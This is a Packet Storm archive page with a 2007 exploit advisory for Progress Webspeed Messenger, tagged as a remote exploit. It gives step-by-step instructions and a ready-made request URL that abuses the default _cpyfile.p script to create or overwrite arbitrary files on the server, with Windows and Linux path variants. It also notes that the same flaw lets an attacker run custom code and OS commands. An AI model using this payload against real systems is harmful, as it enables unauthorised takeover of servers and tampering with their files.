what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

webspeed-exec.txt

webspeed-exec.txt
Posted Apr 25, 2007
Authored by Eelko Neven

A flaw in _cpyfile.p in Progress Webspeed Messenger allows remote attackers to gain full control of a system.

tags | exploit, remote
SHA-256 | a29b9734ca0fdc7a305fcfd890b442bc7ec97cce4f6a97ae774c37689445cf30

webspeed-exec.txt

Change Mirror Download
Because of a flaw in _cpyfile.p which is a default installed file it is possible to gain full control of a machine running Progress Webspeed Messenger.  You can access, change and edit allmost any file on the server running the Webspeed Messenger even when the workshop is disabled.

First you have to find the messenger execution url. For example:
http://yourmachine.com/scripts/cgiip.exe/WService=wsbroker1
http://yourmachine.com/scripts/wsisa.dll/WService=wsbroker1

just add the following to the url:
/webutil/_cpyfile.p?options=save,editor&tempFile=dummy.tmp&fileName=C:/root.txt&action=last&section=1&txt0=Test

your url will look like this:
http://yourmachine.com/scripts/cgiip.exe/WService=wsbroker1/webutil/_cpyfile.p?options=save,editor&tempFile=dummy.tmp&fileName=C:/root.txt&action=last&section=1&txt0=Test

When you execute this, the script will generate a file c:/root.txt which contains the text Test.
For a Linux host just change the filename=C:/root.txt into filename=/tmp/root.txt

_cpyfile.p replaces the file if it allready exist. This is just a simple example to create a file root.txt with the text test in it. But it is also possible to write your own webspeed code and execute it. And webspeed supports OS-Commands so there are multiple ways of exploiting this flaw If tried this on webspeed 3.1a , 3.1d and 3.1e everytime it worked.
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close